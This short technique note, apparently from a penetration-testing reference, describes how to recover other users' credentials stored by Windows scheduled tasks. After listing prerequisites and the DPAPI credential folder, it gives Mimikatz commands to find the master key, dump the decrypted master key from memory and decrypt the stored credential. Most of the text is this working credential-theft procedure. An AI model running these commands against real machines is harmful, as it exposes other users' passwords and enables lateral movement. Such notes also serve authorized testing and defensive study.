Requirements
- Local admin
- Existing stored scheduled task credentials
Scheduled tasks may store credentials of other users so that it may run a task under that user without having the user logging in. The credentials are stored in C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
encrypted by DPAPI.
To obtain the stored credentials:
- Use Mimikatz to find the master key used to encrypt the credential:
mimikatz dpapi::cred /in:c:\path\to\cred
- Use
mimikatz !sekurlsa::dpapi
to dump the decrypted master key. - Decrypt credentials using:
mimikatz dpapi::cred /in:c\path\to\cred /masterkey:[master-key-hex]